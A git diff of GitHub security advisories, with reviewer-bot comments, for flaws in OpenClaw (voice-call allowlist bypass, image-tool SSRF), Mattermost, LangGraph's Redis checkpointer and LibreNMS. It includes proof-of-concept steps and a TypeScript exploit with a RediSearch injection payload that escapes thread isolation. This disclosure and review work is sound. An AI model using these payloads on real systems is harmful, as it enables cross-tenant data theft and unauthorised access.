a/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json b/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json new file mode 100644 index 0000000000000..4d6bd69616268 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json 
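Review bot: The Affected Packages section still reads "Fixed: `>= 2026.2.14` (planned)", but the `fixed` event and the `releases/tag/v2026.2.14` reference show the release shipped; drop "(planned)" so the prose matches the range. The description says verification now fails closed when `telnyx.publicKey` is absent, but does not say whether the Ed25519 check also binds the Telnyx timestamp header with a bounded skew window — without that, a captured validly-signed event can be replayed against the endpoint; confirm against commit 29b587e and mention it if covered. `skipSignatureVerification: true` is listed under Workarounds, which operators skim for mitigations; it is the bypass, not a workaround, and belongs only under the local-development caveat with the existing "should not be used in production" wording.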
@@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rj2-gpmh-qq5x", + "modified": "2026-02-17T21:36:34Z", + "published": "2026-02-17T21:36:34Z", + "aliases": [], + "summary": "OpenClaw has an inbound allowlist policy bypass in voice-call extension (empty caller ID + suffix matching)", + "details": "### Summary\n\nAn authentication bypass in the optional `voice-call` extension/plugin allowed unapproved or anonymous callers to reach the voice-call agent when inbound policy was set to `allowlist` or `pairing`.\n\nDeployments that do not install/enable the `voice-call` extension are not affected.\n\n### Affected Packages / Versions\n\n- `openclaw` (npm): `<= 2026.2.1`\n- Fixed in: `>= 2026.2.2`\n\n### Details\n\nIn affected versions (for example `2026.2.1`), the inbound allowlist check in `extensions/voice-call/src/manager.ts` used suffix-based matching and accepted empty caller IDs after normalization.\n\nThis allowed two bypasses:\n\n1. Missing/empty `from` values normalized to an empty string, which caused the allowlist predicate to evaluate as allowed.\n2. Suffix-based matching meant any caller number whose digits ended with an allowlisted number would be accepted.\n\n### Proof Of Concept\n\n1. Configure the voice-call extension with `inboundPolicy: allowlist` and `allowFrom: [\"+15550001234\"]`.\n2. Place/trigger an inbound call with missing/empty caller ID (provider-dependent; for example anonymous/restricted caller). The call is accepted.\n3. Place a call from a number whose E.164 digits end with `15550001234` (for example `+99915550001234`). 
The call is accepted.\n\n### Impact\n\nOnly operators who install/enable the optional `voice-call` extension and use `inboundPolicy=allowlist` or `pairing` could have inbound access controls bypassed, potentially allowing unauthorized callers to reach auto-response and tool execution.\n\n### Fix\n\nThe fix hardens inbound policy handling:\n\n- Reject inbound calls when caller ID is missing.\n- Require strict equality when comparing normalized caller IDs against the allowlist (no suffix/prefix matching).\n- Add regression tests for missing caller ID, anonymous caller ID, and suffix-collision cases.\n\nFix commit(s):\n\n- `f8dfd034f5d9235c5485f492a9e4ccc114e97fdb`\n\nThanks @simecek for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4rj2-gpmh-qq5x" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f8dfd034f5d9235c5485f492a9e4ccc114e97fdb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:36:34Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-56f2-hvwg-5743/GHSA-56f2-hvwg-5743.json b/advisories/github-reviewed/2026/02/GHSA-56f2-hvwg-5743/GHSA-56f2-hvwg-5743.json new file mode 100644 index 0000000000000..80645760a9ffb --- /dev/null 
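Review bot: Even with the fix's strict equality, the allowlist compares against the provider-supplied `from` caller ID, which an attacker can choose via caller-ID spoofing on the PSTN; the Impact section should say that `inboundPolicy=allowlist` filters on an unauthenticated identifier and is not authentication for auto-response and tool execution, and point operators at provider-side attestation where available or a secondary check before tool-enabled flows. The Fix bullet "Reject inbound calls when caller ID is missing" should specify that the emptiness check runs after normalization, since the bypass arose because a value normalized to the empty string was accepted — a pre-normalization non-empty check would leave the `anonymous`/`restricted` case open. No CVE is assigned (`aliases: []`, `nvd_published_at: null`) despite CRITICAL severity; requesting one would let scanners keyed on CVE IDs pick this up.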
+++ b/advisories/github-reviewed/2026/02/GHSA-56f2-hvwg-5743/GHSA-56f2-hvwg-5743.json 
@@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56f2-hvwg-5743", + "modified": "2026-02-17T17:13:35Z", + "published": "2026-02-17T17:13:35Z", + "aliases": [], + "summary": "OpenClaw affected by SSRF in Image Tool Remote Fetch", + "details": "## Summary\n\nA server-side request forgery (SSRF) vulnerability in the Image tool allowed attackers to force OpenClaw to make HTTP requests to arbitrary internal or restricted network targets.\n\n## Affected Versions\n\n- npm: openclaw <= 2026.2.1\n\n## Patched Versions\n\n- npm: openclaw 2026.2.2 and later\n\n## Fix Commits\n\n- 81c68f582d4a9a20d9cca9f367d2da9edc5a65ae (guard remote media fetches with SSRF checks)\n- 9bd64c8a1f91dda602afc1d5246a2ff2be164647 (expand SSRF guard coverage)\n\n## Details\n\nThe Image tool accepts file paths, file:// URLs, data: URLs, and http(s) URLs. In vulnerable versions, http(s) URLs were fetched without SSRF protections, enabling requests to localhost, RFC1918, link-local, and cloud metadata targets.\n\nThis was fixed by routing remote media fetching through the SSRF guard (private/internal IP + hostname blocking, redirect hardening, DNS pinning).\n\n## Exploitability Notes\n\n- Requires attacker-controlled invocation of the Image tool (direct tool access, or a gateway/channel surface that forwards untrusted `image` arguments into tool calls).\n- The image tool expects the fetched content to be an image. Many high-value SSRF targets return text/JSON (for example cloud metadata endpoints), which will typically fail media-type validation. In practice, the most direct confidentiality impact comes from internal endpoints that actually return images (screenshots/renderers, camera snapshots, chart exports, etc.).\n- Remote fetches are GET-only with no custom headers. 
Some metadata services require special headers or session tokens (for example GCP `Metadata-Flavor`, AWS IMDSv2 token), which can further reduce the likelihood of direct credential theft in some environments.\n- Despite the above constraints, SSRF remains a powerful primitive: it can enable internal network probing and access to unauthenticated/internal HTTP endpoints, and can chain with other weaknesses if present.\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-56f2-hvwg-5743" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/81c68f582d4a9a20d9cca9f367d2da9edc5a65ae" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9bd64c8a1f91dda602afc1d5246a2ff2be164647" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T17:13:35Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json new file mode 100644 index 0000000000000..c28727a9374af --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-57cc-2pf4-mhmx/GHSA-57cc-2pf4-mhmx.json 
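Review bot: The Details say the Image tool also accepts local file paths and `file://` URLs, but the advisory is silent on whether those inputs are constrained by the same change; since the exploitability notes already assume an attacker who controls the `image` argument, it should state whether local reads are intended and bounded (a sandbox root or deny-list) or explicitly out of scope, so operators do not read the http(s)-only guard as full coverage. The media-type-validation argument only limits what is returned to the attacker; the request is still sent, so blind SSRF (host/port probing via latency and error text, side-effecting GETs against internal services) remains, which the final bullet acknowledges but the preceding bullets understate. On "DNS pinning": it would help readers to note that the address validated must be the one actually connected to (resolve once, connect by IP, keep the original host for Host/SNI), since a check followed by a fresh resolution reopens the rebinding window.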
@@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-57cc-2pf4-mhmx", + "modified": "2026-02-19T19:35:24Z", + "published": "2026-02-16T15:32:47Z", + "aliases": [ + "CVE-2025-14350" + ], + "summary": "Mattermost fails to properly validate team membership when processing channel mentions", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate team membership when processing channel mentions which allows authenticated users to determine the existence of teams and their URL names via posting channel shortlinks and observing the channel_mentions property in the API response. Mattermost Advisory ID: MMSA-2025-00563", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost/server/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0-20251209134645-761e56bb11cc" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.1.3" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 10.11.10" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.2.2" + } + }, + { + "package": { + "ecosystem": "Go", + "name": 
"github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.3.2-0.20251209134645-761e56bb11cc" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14350" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/761e56bb11ccb751ddbe4bab5898ccc2b384fd82" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:35:24Z", + "nvd_published_at": "2026-02-16T13:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json index 40168473dad55..78729e2a9fa3c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json +++ b/advisories/github-reviewed/2026/02/GHSA-5g94-c2wx-8pxw/GHSA-5g94-c2wx-8pxw.json @@ -55,6 +55,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-23" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json new file mode 100644 index 0000000000000..fc0753303755a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5mx2-w598-339m/GHSA-5mx2-w598-339m.json 
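Review bot: Three of the `github.com/mattermost/mattermost-server` ranges carry only an `introduced` event (11.1.0, 10.11.0, 11.2.0) with the fixed version expressed solely in `database_specific.last_known_affected_version_range`; `database_specific` is opaque to OSV-schema consumers, so these ranges are open-ended and will flag 11.1.3, 10.11.10 and 11.2.2 — the versions the summary implies are fixed — as vulnerable. If the fixed tags are not published on that module path, close each range with a `last_affected` event: `"last_affected": "11.1.2"`, `"last_affected": "10.11.9"`, `"last_affected": "11.2.1"`. The `introduced: 0` ranges fixed at the `20251209134645-761e56bb11cc` pseudo-versions are the only machine-actionable entries here and rely on the single referenced commit being the complete fix for all three branches, which the advisory should state explicitly.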
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mx2-w598-339m", + "modified": "2026-02-23T22:20:29Z", + "published": "2026-02-18T22:40:09Z", + "aliases": [ + "CVE-2026-27022" + ], + "summary": "RediSearch Query Injection in @langchain/langgraph-checkpoint-redis", + "details": "## Summary\n\nA query injection vulnerability exists in the `@langchain/langgraph-checkpoint-redis` package's filter handling. The `RedisSaver` and `ShallowRedisSaver` classes construct RediSearch queries by directly interpolating user-provided filter keys and values without proper escaping. RediSearch has special syntax characters that can modify query behavior, and when user-controlled data contains these characters, the query logic can be manipulated to bypass intended access controls.\n\n## Attack surface\n\nThe core vulnerability was in the `list()` methods of both `RedisSaver` and `ShallowRedisSaver`: these methods failed to escape RediSearch special characters in filter keys and values when constructing queries. When unescaped data containing RediSearch syntax was used, the injected operators were interpreted by RediSearch rather than treated as literal search values.\n\nThis escaping bug enabled the following attack vector:\n\n- **Thread boundary escape via OR operator**: RediSearch uses `|` as an OR operator with specific precedence rules. A query like `A B | C` is interpreted as `(A AND B) OR C`. 
By injecting `}) | (@thread_id:{*` into a filter value, an attacker can append an OR clause that matches all threads, effectively bypassing the thread isolation constraint.\n\nThe injected query `(@thread_id:{legitimate-thread}) (@source:{x}) | (@thread_id:{*})` matches:\n\n- Documents with `thread_id:legitimate-thread AND source:x`, OR\n- Documents with ANY `thread_id`\n\nThe second clause matches all threads, bypassing thread isolation entirely.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n- **Pass user-controlled input to filter parameters** — When using `getStateHistory()` or `checkpointer.list()` with filter values derived from user input, HTTP parameters, or other untrusted sources.\n- **Use Redis checkpointing in multi-tenant applications** — Applications that rely on thread isolation to separate data between users or tenants are at risk of cross-tenant data access.\n\nThe most common attack vector is through API endpoints that expose filtering capabilities to end users, allowing them to search or filter their conversation history.\n\n## Impact\n\nAttackers who control filter input can bypass thread isolation by injecting RediSearch OR operators to construct queries that match all threads regardless of the intended thread constraint. 
This enables access to checkpoint data from threads the attacker is not authorized to view.\n\nKey severity factors:\n\n- Enables complete bypass of thread-based access controls\n- Sensitive conversation data from other users may be exposed\n- Affects multi-tenant applications relying on thread isolation for data separation\n- Requires only control over filter input values (common in user-facing APIs)\n\n## Exploit example\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\nconst saver = new RedisSaver({ /* redis config */ });\n\n// Normal usage - should only see thread \"user-123-thread\"\nconst legitHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: { source: \"loop\" }\n});\n\n// Attacker crafts malicious filter value\nconst attackerFilter = {\n source: \"x}) | (@thread_id:{*\" // Injects OR clause matching ALL threads\n};\n\n// This produces a query like:\n// (@thread_id:{user-123-thread}) (@source:{x}) | (@thread_id:{*})\n// Due to precedence, this matches ALL threads!\n\nconst stolenHistory = saver.list({\n configurable: { thread_id: \"user-123-thread\" }\n}, {\n filter: attackerFilter\n});\n\n// stolenHistory now contains checkpoints from ALL threads - DATA LEAKED!\n```\n\n## Security hardening changes\n\nThe 1.0.2 patch introduces the following changes:\n\n- **Escape utility function**: A new `escapeRediSearchTagValue()` function properly escapes all RediSearch special characters (`- . < > { } [ ] \" ' : ; ! @ # $ % ^ & * ( ) + = ~ | \\ ? /`) by prefixing them with backslashes.\n- **Filter key escaping**: All filter keys are escaped before being used in query construction.\n- **Filter value escaping**: All filter values are escaped before being interpolated into RediSearch tag queries.\n\n## Migration guide\n\n### No changes needed for most users\n\nThe fix is backward compatible. 
Existing code will work without modifications—filter values that previously worked will continue to work, with the added protection against injection:\n\n```typescript\nimport { RedisSaver } from \"@langchain/langgraph-checkpoint-redis\";\n\n// Works exactly as before, now with injection protection\nconst history = saver.list(config, {\n filter: { source: \"loop\" }\n});\n```\n\n### If you were relying on special characters\n\nIf your application intentionally used RediSearch syntax in filter values (unlikely but possible), be aware that these characters will now be escaped and treated as literals.\n\n### For applications with user-facing filters\n\nNo code changes required, but this is a good time to review your API design:\n\n```typescript\n// Before: Vulnerable to injection\napp.get(\"/history\", async (req, res) => {\n const history = await saver.list(config, {\n filter: req.query.filter // User-controlled - was vulnerable\n });\n});\n\n// After: Now safe, but consider validating allowed filter keys\napp.get(\"/history\", async (req, res) => {\n const allowedKeys = [\"source\", \"step\"];\n const sanitizedFilter = Object.fromEntries(\n Object.entries(req.query.filter || {})\n .filter(([key]) => allowedKeys.includes(key))\n );\n const history = await saver.list(config, {\n filter: sanitizedFilter\n });\n});\n```\n\n> **Recommendation**: Even with the fix in place, consider validating that filter keys are from an allowed list as a defense-in-depth measure.\n\n## References\n\n- [RediSearch Query Syntax](https://redis.io/docs/interact/search-and-query/query/)\n- [LangGraph Checkpoint Documentation](https://langchain-ai.github.io/langgraphjs/)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@langchain/langgraph-checkpoint-redis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": 
"1.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/security/advisories/GHSA-5mx2-w598-339m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27022" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/pull/1943" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/commit/814c76dc3938d0f6f7e17ca3bc11d6a12270b2a1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/langchain-ai/langgraphjs" + }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langgraphjs/releases/tag/@langchain/langgraph-checkpoint-redis@1.0.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:40:09Z", + "nvd_published_at": "2026-02-20T22:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json new file mode 100644 index 0000000000000..73c3c3c48bb22 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json 
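Review bot: The hardening list escapes filter keys and filter values, but the query shown — `(@thread_id:{legitimate-thread}) (@source:{x}) | ...` — also interpolates `thread_id` from `config.configurable`, which in most checkpointer deployments is caller-supplied too (likewise `checkpoint_ns` if used); the advisory should confirm those values are routed through `escapeRediSearchTagValue()` as well, otherwise the same `}) | (@thread_id:{*` payload works via the thread id instead of the filter. The listed escape set omits whitespace; depending on query dialect RediSearch treats unescaped spaces inside `{...}` as token separators, so confirm the helper escapes spaces or that values containing them are rejected, to avoid a residual parse differential. The migration guide's allow-list of filter keys is the right defense in depth; it would be worth adding that values should also be constrained to strings of bounded length before reaching `list()`.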
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqf-54qp-32wx", + "modified": "2026-02-20T16:51:51Z", + "published": "2026-02-18T22:07:19Z", + "aliases": [ + "CVE-2026-26991" + ], + "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting", + "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n